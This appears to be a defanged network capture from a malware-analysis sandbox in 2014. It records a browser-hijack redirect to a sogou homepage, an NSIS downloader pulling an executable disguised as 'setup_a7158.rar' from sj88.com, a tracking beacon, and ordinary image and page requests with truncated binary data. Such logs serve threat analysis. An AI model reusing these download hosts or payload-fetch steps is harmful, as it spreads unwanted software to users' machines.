..9.......T{.N.9M ....JT;..::..a=....T..:........88>.......!#.g.r.t......<.@]F..>H..n.......o....G.P&.\.......!.|.%#&b{.....It.Gu.....Q.Aj..G...'TEQ.=..r.T.:...A...1~.....z.U.ly.Q.... ZdK....g....x....4.5.P.EA.H.....x.RN%A. .A..@..2....:.._....~.........Ow..5W..d.t.(....Ut.....* -....Q.s.!.......*z......V......L...^3.P=B...............9} .....dt(....4......@...N.G...bJB2..u.s.H..2....MHY....RC....:.T1....)..'y...Ce....]...#qQ....j...A#(.I
<<
<<< skipped >>>
GET /images/weather/cloudy.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0; SDUV=1399956570462_5852_00001; CKOR=6846_00001_00000; CKOD=3030_00000_00000; IPLOC=UA; GOTO=Af22014; SUV=00461146C18AF4E75371A4556E6A4053
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:26 GMT
Content-Type: image/gif
Content-Length: 1663
Connection: keep-alive
Last-Modified: Sun, 09 Oct 2011 10:21:06 GMT
ETag: "4e917592-67f"
Expires: Sun, 18 May 2014 09:22:30 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a(.(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................y....................................................................................................................................................................................................................................................................!.......,....(.(........H......*\......#J.H1..t..bCa..(Q..eL(..7........H..x]..H..ff\......X.P.H....@.D.L.....R.H.4DM..gZ..9O.1.....ajT.Q..H.#F......Xa.....04. eS...z.*E....E.......?Ql...'.&*.k402...6l.D...L#(v<.2....g..)Q....W#0..!.G//q.....N.0.....Q........... 2x...........y....Z...Yx...#Sh..$....~..8.a..KY...*y....@...4....PC........q..r.".X.B.^..I.1...;.es...$....x"..q$QA.)\....X`..P.......J8.....aqp...L..!..`.1..r.......".....h.N7.}..$...C.Q......P.(<....?....t.....!.N45.B.*?...............py.$.@2...4...<!$.20P`..Pd.. Y....)..B........H............"..#..........D.Z,...E.RD 3... \,..;.T..2V`.H.. .D"L......A.!R.!B.....C]$..0[...4R.2..D..A!j...0?DAG..84.&.T1..R....6H!..eD.B..t.......-s81.......?.R./..1F...D..v....O..H#..-uB..3.=Xc....
<<
<<< skipped >>>
GET /v53/get_tj.php?hz=4666521&ids=qiche HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://123.sogou.com/?22014
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0; SDUV=1399956570462_5852_00001; CKOR=6846_00001_00000; CKOD=3030_00000_00000; IPLOC=UA; _seCityCode2=CN110100; tjv2_cont=00_01_08_09; GOTO=Af22014; SUV=00DD04B9C18AF4E75371A458B1D10495
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:31 GMT
Content-Type: text/javascript; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.1.6
10b3..{"qiche":[{"tab":"\u6c7d\u8f66","taburl":"http:\/\/123.sogou.com\/shwz\/qiche.html","list":[{"picurl":"http:\/\/pic4.xcarimg.com\/img\/news_photo\/2014\/05\/12\/fIXLig2wT89333.jpg","url":"http:\/\/price.xcar.com.cn\/serise166\/city9999-1-1.htm?zoneclick=100517","title":"\u51ef\u7f8e\u745e\u21934.1\u4e07","price":""},{"picurl":"http:\/\/pic1.xcarimg.com\/img\/news_photo\/2014\/05\/12\/1oq9Gg9Y3L8813.jpg","url":"http:\/\/price.xcar.com.cn\/serise601\/city9999-1-1.htm?zoneclick=100517","title":"\u5e15\u8428\u7279\u21933.6\u4e07","price":""},{"url":"http:\/\/price.xcar.com.cn\/serise1087\/city9999-1-1.htm?zoneclick=100517","title":"\u6bd4\u4e9a\u8feaS6 \u73b0\u91d1\u4f18\u60e01\u4e07\u5143","color":false},{"url":"http:\/\/price.xcar.com.cn\/serise1608\/city9999-1-1.htm?zoneclick=100517","title":"\u65b0\u4e00\u4ee3\u8f69\u9038 \u4f18\u60e01.7\u4e07\u5143","color":false},{"url":"http:\/\/price.xcar.com.cn\/serise257\/city9999-1-1.htm?zoneclick=100517","title":"\u6bd4\u4e9a\u8feaF3 \u73b0\u91d1\u4f18\u60e01\u4e07\u5143","color":false},{"url":"http:\/\/price.xcar.com.cn\/serise1338\/city9999-1-1.htm?zoneclick=100517","title":"\u5954\u9a70GLK\u7ea7 \u8d2d\u8f66\u4f18\u60e05.5\u4e07","color":false}]},{"tab":"\u65b0\u8f66","taburl":"http:\/\/123.sogou.com\/shwz\/qiche.html","list":[{"picurl":"http:\/\/pic5.xcarimg.com\/img\/news_photo\/2014\/05\/12\/O2xA3C6VhB1569.jpg","url":"http:\/\/price.xcar.com.cn\/serise1261\/city9999-1-1.htm?zoneclick=100518","title":"\u9038\u81f4","price":"\u964d2.6\u4e07"},{"picurl":"htt
<<
<<< skipped >>>
GET /imgu/2014/05/20140512170546_833.jpg HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p9.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/jpeg
Content-Length: 4723
Last-Modified: Mon, 12 May 2014 09:05:46 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
......JFIF.............0Exif..II*.......1...............VVV.meitu.com....C....................................................................C.......................................................................=._...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....0..4.....2..:v...".j.2Z.=.NQ...?..{..r...FH.k..V..6t.1k].}*......Q.Gs..8?.j..".Z0...=..>'..m...}..2].........c. ..W.*>...9jBQ......H.t..n...E..7......1.9..K..G.'.3...K$..i..^......E.....MJ.S.YL.kef.7............~f....4..g.N.\ms.[....>.~..?.k...>..'..GE.x......=>.{..Ve...x.e|J...@ ..$...S.8..FV.6kB........{./...._.>(j..~#iia.h......t.A2r.2...`......tj.M{........f5..\...Y..X...Mc....2.>.....{I...U.......ZS.i.....[X....} X.Ah.`I...t....}.*..d.f..2.....i.h...V....gf.r......}..:..Q((J.3...u..^.d..t.N.Wq....JM.rH.f........K...0..x.kf.k..F.0..S.........f....g...nO....Gj.p..V.wZt:'_....<...|..4v.II..s.'5........#*.....>1|2...ii.m8B......G.......$.Dy.i....O......>.......a.....-.O.............l.....N.5.P2....I.Y.85....k....<...S......<.w.s.....'.mlu......[.K..\.)%..6.....w.Sx...c...E....k.h...{..{_~...o.........-t...F....
<<
<<< skipped >>>
GET /img/news_photo/2014/05/12/fIXLig2wT89333.jpg HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pic4.xcarimg.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Expires: Tue, 12 May 2015 04:00:18 GMT
Date: Mon, 12 May 2014 04:00:18 GMT
Server: Apache
Last-Modified: Mon, 12 May 2014 02:55:05 GMT
Cache-Control: max-age=31536000
Content-Type: image/jpeg
Content-Length: 5534
Accept-Ranges: bytes
Xcar-Cache-Server: imgcache2-HIT
Age: 1
X-Via: 1.1 zjjx158:80 (Cdn Cache Server V2.0), 1.1 gl25:1 (Cdn Cache Server V2.0)
Connection: keep-alive
......Exif..II*.................Ducky.......d.....)hXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:104A21BBC38311E382E2ECE6B616ED1C" xmpMM:DocumentID="xmp.did:104A21BCC38311E382E2ECE6B616ED1C"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:104A21B9C38311E382E2ECE6B616ED1C" stRef:documentID="xmp.did:104A21BAC38311E382E2ECE6B616ED1C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................................U._..............................................................................................!..1.Q#..A".aq.2BR.3D&......................!1..AQaq..".........2R#3............?....N.8D...N.8D...N.8D...N.8D...N.8D...N.8D...N.8D...N.8D...N.8D...N.8D..~..?.1.wK..d...#...9..."....3L.E..pv.pPV(.....B...0..f.....Q.1?%W9C.~.c93....y..:I......9;..m.:.S1..W'0.c......aI.3.T.....N..0^...U..I;&...S.v.{N.:/s..N.......u..9T.T..S,...R..NJw...&<?uhUe...wY..f<.`MV..4.../..
<<
<<< skipped >>>
GET /hezi/jm/setup_a7158.rar HTTP/1.0
Host: VVV.sj88.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:28 GMT
Content-Type: application/x-rar-compressed
Content-Length: 3732104
Connection: close
Last-Modified: Wed, 07 May 2014 07:50:55 GMT
X-Cache: EXPIRED
X-Cache: HIT
Accept-Ranges: bytes
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....WZR..................................... ....@.................................L=9..........@....................................................8..............................................................................................text...,........................... ..`.itext..D........................... ..`.data........ ......................@....bss.....V...0...........................idata..............................@....tls.....................................rdata..............................@..@.rsrc................ ..............@..@....................................@..@..................................................................................................................................................................@...AnsiChar............@...string(.@...AnsiString......@...............................@......... 9@.(9@..9@..9@..9@..9@..9@..9@.,8@.H8@..8@..TObject.%..A....%..A....%..A....%..A....%..A....%..A....%(.A....%..A....%$.A....%..A....%..A....%..A....%..A....%..A....%|.A....%x.A....%t.A....%p.A....%l.A....%h.A....% .A....%d.A....%`.A....%\.A....%..A....%..A....%..A....%X.A....%T.A....%..A....%..A....%..A....%P.A....%L.A....%H.A....%D.A....%@.A...S..........$D...T.J....D$,.t...\$0....D[..@..%<.A....%8.A....
<<
<<< skipped >>>
GET /img/news_photo/2014/05/12/1oq9Gg9Y3L8813.jpg HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pic1.xcarimg.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Expires: Tue, 12 May 2015 04:00:18 GMT
Date: Mon, 12 May 2014 04:00:18 GMT
Server: Apache
Last-Modified: Mon, 12 May 2014 02:55:16 GMT
Cache-Control: max-age=31536000
Content-Type: image/jpeg
Content-Length: 5243
Accept-Ranges: bytes
Xcar-Cache-Server: imgcache1-HIT
Age: 1
X-Via: 1.1 tzwl37:8080 (Cdn Cache Server V2.0), 1.1 gl27:1 (Cdn Cache Server V2.0)
Connection: keep-alive
......Exif..II*.................Ducky.......d.....)hXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:297A1A15C38311E387729AE07621B962" xmpMM:DocumentID="xmp.did:297A1A16C38311E387729AE07621B962"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:297A1A13C38311E387729AE07621B962" stRef:documentID="xmp.did:297A1A14C38311E387729AE07621B962"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................................U._...............................................................................................!1....AQa#.R$."2Br%.......................!1.AQa...q.."..BR...$............?.............................................................03.X..5,.......d[DUy (.e...|{b....Q.P.PI..R.!.L....8C}....1.X.... .`1..i ..jR....t.p.7.......8T.a....*...........2V..:..w..?....!.s... nl.@....)..vK(.S&t}..l....A.....0.J...0...*....".....2....3(E=0 v92.>."D.;. *..Cn.....Q=..VS.D
<<
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: lvdou.300duo.com
Connection: Keep-Alive
HTTP/1.1 302 Object moved
Date: Tue, 13 May 2014 04:49:23 GMT
Server: Microsoft-IIS/6.0
Location: hXXp://123.sogou.com/?22014
Content-Length: 148
Content-Type: text/html
Set-Cookie: daohang=1; path=/
Set-Cookie: ASPSESSIONIDAAQBQDRT=LPBGIBHAHMIAKLCFMNMJAIJH; path=/
Cache-control: private
<head><title>Object moved</title></head>.<body><h1>Object Moved</h1>This object may be found <a HREF="hXXp://123.sogou.com/?22014">here</a>.</body>.HTTP/1.1 302 Object moved..Date: Tue, 13 May 2014 04:49:23 GMT..Server: Microsoft-IIS/6.0..Location: hXXp://123.sogou.com/?22014..Content-Length: 148..Content-Type: text/html..Set-Cookie: daohang=1; path=/..Set-Cookie: ASPSESSIONIDAAQBQDRT=LPBGIBHAHMIAKLCFMNMJAIJH; path=/..Cache-control: private..<head><title>Object moved</title></head>.<body><h1>Object Moved</h1>This object may be found <a HREF="hXXp://123.sogou.com/?22014">here</a>.</body>...
GET /?22014 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.sogou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:17 GMT
Content-Type: text/html; charset=gbk
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa HISa TELa OTPa OUR UNRa IND UNI COM NAV INT DEM CNT PRELOC"
Content-Encoding: gzip
90c9................\.u/...gb!..=......`v..X........7.2....12N>6.A ....@ @...$.yy...G.;..b...~.sj.Uw..I..21..[.T..sN..N......{....$..V3...{.~p_b"9=.......O.O|....y8.I..O..v.1ht.Nsz.......`.]..^[[K..R.^m..'......,?&......2.|?...]..|..1h..W>:}..g.N.<..........W~.......y..L.;..O3.\...u..r.u..x...;p0.A7...6V.&..|zOr_..u..R..H.;....,M<x`.@k.t....f'.................`...X.;..;X..V0.........w}......0.)=.)5...?...............s.....N......n....v..............g.....3ZN.....}...M..t......8y..o..z.....x..H?{s.c...r...u....U..............{.....o.A.{.....#....^.y....^?v........}..K.~|...?<.W....[.....7....O....s?....?...g..._...7....4HB..?|.o...............;......n....c..$...J..6.&.X..D..V.&..-......*....&...[.y<.....8}4.....hI...x..;......U.....K.....B.]K...........-|.Z\k. ...j!..^..Z..|....C.j.....?....u3....K..*)M8.J..~z.iO.. ..t......Xr.. .?..b:.N.9.V..:...Z_..`N.....'Um..y_........8ht...}..CZ5R..f).Y5.-..1.!.V...V..V-....~5lo._:.. ...%.@.`........&.K....35lN5.S..T.......zv....N...j...j....T.m...T..e....*..Je.mm..^..^Hw..v.J.....-'...%........-g..ivz...*.-..' n...Bv.....Yn.No.......D...l..I...Y.6;.`..V.[.l.e_&A3..}...{.Z}...zne.I...I..Q.W<..\.....B.....s..-J.. ...[...P......0..Eh.,9..Z.._.&....59.v.Q...,......,....Uwq#..r....V!..........4HL|m...T...V.m.5*..B&.......G{k..*...2%..A.....M.;.F%1Y...bW..)..p`.f.....z......j>.).?i..#..3.t 4h..3.....K... 6y2.E.E.?.......09(.M...@..a..RkT..C.-..V.....;...~7..O ...j.;._i.s)..oW..I..........>...F..t..J.NyE""W0.M8..H?x..&A.O..e.4......1.,.h..a.........M...
<<
<<< skipped >>>
GET //v53/get_123_v53.php?block=wt&ver=v53&gfg=1&city=unknown&pid=Af22014&c=1399956570478&method=ajaf&cbf=fn HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0; SDUV=1399956570462_5852_00001; CKOR=6846_00001_00000; CKOD=3030_00000_00000; GOTO=Af22014
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: text/javascript; charset=gbk
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: IPLOC=UA; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
X-Powered-By: PHP/5.1.6
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: max-age=0
e02..sg_wt_cb({"cn":["110100","北京"],"wt7":[["2014-05-13",2,"多云","cloudy.gif",17,30,"北风 3-4级"],["2014-05-14",3,"晴转多云","fine_cloudy.gif",10,24,"北风 3-4级"],["2014-05-15",4,"晴转多云","fine_cloudy.gif",16,29,"微风"],["2014-05-16",5,"晴转多云","fine_cloudy.gif",18,29,"微风"],["2014-05-17",6,"阴","cloudy.gif",15,25,"微风"],["2014-05-18",0,"阴转多云","cloudy.gif",14,24,"微风"],["2014-05-19",1,"多云","cloudy.gif",16,27,"微风"]],"city":"CN110100","ip":"193.138.244.231","md":"05-13","week":"2","nongli":"四月十五","tuanmv":"","pm":138});tjv2_cb({"tj_utag":"00_01_08","data":{"news":[{"tab":"\u5934\u6761","taburl":"http:\/\/123.sogou.com\/xinwen\/","list":[{"title":"\u7f51\u6c11\u5728\u5883\u5916\u7f51\u7ad9\u62b9\u9ed1\u4e2d\u56fd\u88ab\u5211\u62d8","picurl":0,"url":"http:\/\/news.sohu.com\/20140513\/n399470242.shtml?pvid=7d0a16e31613c9e0","color":false},{"title":"\u8700\u516c\u4ea4\u7206\u71c3\u7cfb\u4eba\u4e3a\u7eb5\u706b\u5acc\u72af\u88ab\u70e7\u6b7b","picurl":0,"url":"http:\/\/news.sohu.com\/20140513\/n399470183.shtml?pvid=7d0a16e31613c9e0","color":false},{"title":"\u4e4c\u514b\u51702\u5dde\u5ba3\u5e03\u6210\u4e3a\u72ec\u7acb\u4e3b\u6743\u56fd\u5bb6","picurl":0,"url":"http:\/\/news.qq.com\/a\/20140513\/000421.htm","color":"red"},{"title":"\u4e60\u8fd1\u
<<
<<< skipped >>>
GET /images/weather/fine_cloudy.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0; SDUV=1399956570462_5852_00001; CKOR=6846_00001_00000; CKOD=3030_00000_00000; IPLOC=UA; GOTO=Af22014; SUV=00461146C18AF4E75371A4556E6A4053
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:26 GMT
Content-Type: image/gif
Content-Length: 1751
Connection: keep-alive
Last-Modified: Sun, 09 Oct 2011 10:21:05 GMT
ETag: "4e917591-6d7"
Expires: Sun, 18 May 2014 09:22:34 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a(.(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0..[..m..............D....................$.............................'..=..O..]..k..6..M..w..............C..Y....................h.................Q..u..............J..Y..q.............................q.................................!.......,....(.(........H......*\....D..E..(."......I.%..6}..(.F..6e.$J..h.......&M&O....S.w....6...w.@......J..Q..J.UU.X.R....M..&.I...U.b.Z....U..........>."g.T,T.f..% .-_.\.".-.... A.....Y.R.*Fl..f...j....P.0>.T...X.s......e...;......0v.....Z.HE.....|........v.H6L...8S.........}<..)....i..i.%..#H....E.X1k...N.PxQB._.@.>. c.(.4......K,.0..3.....J....B(.....S.6...."p...,.(.M7..s..T, ..R|@B.4..b-.@..#.............C..H.........T..#.(..'..3. ..#..$....At.E.(.`..9...<.....t...-..S..U..@.S....(HQ...p....8.."..../........@...H@.K.....6...;....$....:..0A..D`..R. ..)l..." a..5...?.(.J4..!..2\..... ...x....L...Y......y."...O.0(@..C.!E..t....4Q....pB.-.....`.-B...C...Q..]....S,...K....?....,...8...B.W(`..$..F.%|0..JLpB.A....O..2.....=5..@.
<<
<<< skipped >>>
GET /favicon.ico HTTP/1.1
User-Agent: ...............
Host: 123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0; SDUV=1399956570462_5852_00001; CKOR=6846_00001_00000; CKOD=3030_00000_00000; IPLOC=UA; _seCityCode2=CN110100; tjv2_cont=00_01_08_09; GOTO=Af22014; SUV=00DD04B9C18AF4E75371A458B1D10495
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:35 GMT
Content-Type: image/x-icon
Content-Length: 1150
Connection: keep-alive
Last-Modified: Wed, 21 Sep 2011 09:58:33 GMT
ETag: "4e79b549-47e"
Expires: Sun, 18 May 2014 09:22:29 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
............ .h.......(....... ..... .....@...................................ddd.aaa.___.]]].[[[.XXX.VVV.UUU.............................iiif............................VVV.UUUl....................}}}.....................................fff.UUU................o..........v..t...q..........................bbb.UUUQ....xxx...........F..o...............y............A.........VVV.UUU....v.........b...{...........}....!............... .....~~~.VVVT.........r#..o...w...v...h....E..................w..........XXX..........W...q...h...y(...............................U.....[[[..........X...g....E..........................y......../.....]]]..........g...[........................v..p............G.....___...........P..l...................b...o...~.......y..........aaa..............^...............X...s...x...|...|...n..........ddd-.............................T...l...o...m...b..........~~~......................................{6..o ...Z.............kkk.........................................................qqq............................&........................... ................................................................................HTTP/1.1 200 OK..Server: nginx..Date: Tue, 13 May 2014 04:49:35 GMT..Content-Type: image/x-icon..Content-Length: 1150..Connection: keep-alive..Last-Modified: Wed, 21 Sep 2011 09:58:33 GMT..ETag: "4e79b549-47e"..Expires: Sun, 18 May 2014 09:22:29 GMT..Cache-Control: max-age=2592000..Accept-Ranges: bytes.............. .h.......(....... ..... .....@...................................ddd
<<
<<< skipped >>>
GET /imgn/tips/lk_jumei.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p0.123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: image/png
Content-Length: 731
Last-Modified: Thu, 28 Feb 2013 09:01:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:25 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR...6...).............tEXtSoftware.Adobe ImageReadyq.e<...}IDATx.b<.2....3`., .6........@.$#...&..@.@....................A.1.;..v.....w-.s`....@......X.cR.bb ......?R4.m......$..v.....H...@.......7Ab.@/. 4...D.&`..'Y.C.|..5.".n.A.....KX.g'......KF$.3R.(c.K..&...6zZ.@W.@.XE......!]|vGJ%.......F`........gtO .j..!|....L.{..J...B.AN....,:...9r......,..Tx...z....N...Q.......0..........yr.>.......5.r.a.....]..>./..W2@.)...=..F-.k..g.hb....6........... .z0@.:.*.@y./@.!7x`...E......P..._c.~|.K`?X....u..%.!.)pr.....A......&...Xa~.n...rq.c..#.cQbr...c......hZ....h...S..]j....S...v%..i.Y.o...E..8......}.AG...=..T..\...V...Rx.=.j.~..."9.".....F=62=......... [.011...O........ .......GpA1...$Pu.......7.W.%x.....IEND.B`.HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:49:25 GMT..Content-Type: image/png..Content-Length: 731..Last-Modified: Thu, 28 Feb 2013 09:01:24 GMT..Connection: keep-alive..Expires: Thu, 12 Jun 2014 04:49:25 GMT..Cache-Control: max-age=2592000..Accept-Ranges: bytes...PNG........IHDR...6...).............tEXtSoftware.Adobe ImageReadyq.e<...}IDATx.b<.2....3`., .6........@.$#...&..@.@....................A.1.;..v.....w-.s`....@......X.cR.bb ......?R4.m......$..v.....H...@.......7Ab.@/. 4...D.&`..'Y.C.|..5.".n.A.....KX.g'......KF$.3R.(c.K..&...6zZ.@W.@.XE......!]|vGJ%.......F`........gtO .j..!|....L.{..J...B.AN....,:...9r......,..Tx...z....N...Q.......0..........yr.>.......5.r.a.....]..>./..W2@.)...=..F-.k..g.hb....6........... .z0@.:.*.@y./@.!7x`...E......P
<<
<<< skipped >>>
GET /15909623.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://tongji.uujzy.com/tongji.html?5.0.0.5002_id61_md1_os1
User-Agent: session
Host: img.users.51.la
HTTP/1.1 302 Object moved
Date: Tue, 13 May 2014 04:50:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: hXXp://vipimg.51.la:82/go.asp?svid=1&id=15909623&style=9&vpage=http://tongji.uujzy.com/tongji.html?5.0.0.5002_id61_md1_os1&46204.88.gif
Content-Length: 300
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>.<body><h1>Object Moved</h1>This object may be found <a HREF="hXXp://vipimg.51.la:82/go.asp?svid=1&id=15909623&style=9&vpage=http://tongji.uujzy.com/tongji.html?5.0%2E0.5002_id61_md1_os1&46204.88.gif">here</a>.</body>.HTTP/1.1 302 Object moved..Date: Tue, 13 May 2014 04:50:04 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Location: http://vipimg.51.la:82/go.asp?svid=1&id=15909623&style=9&vpage=http://tongji.uujzy.com/tongji.html?5.0.0.5002_id61_md1%5Fos1&46204.88.gif..Content-Length: 300..Content-Type: text/html..Cache-control: private..<head><title>Object moved</title></head>.<body><h1>Object Moved</h1>This object may be found <a HREF="hXXp://vipimg.51.la:82/go.asp?svid=1&id=15909623&style=9&vpage=http://tongji.uujzy.com/tongji.html?5.0.0.5002_id61_md1_os1&46204.88.gif">here</a>.</body>...
GET /imgn/123ie/search_arrow.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p7.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: image/gif
Content-Length: 447
Last-Modified: Wed, 25 Jul 2012 09:14:49 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:25 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
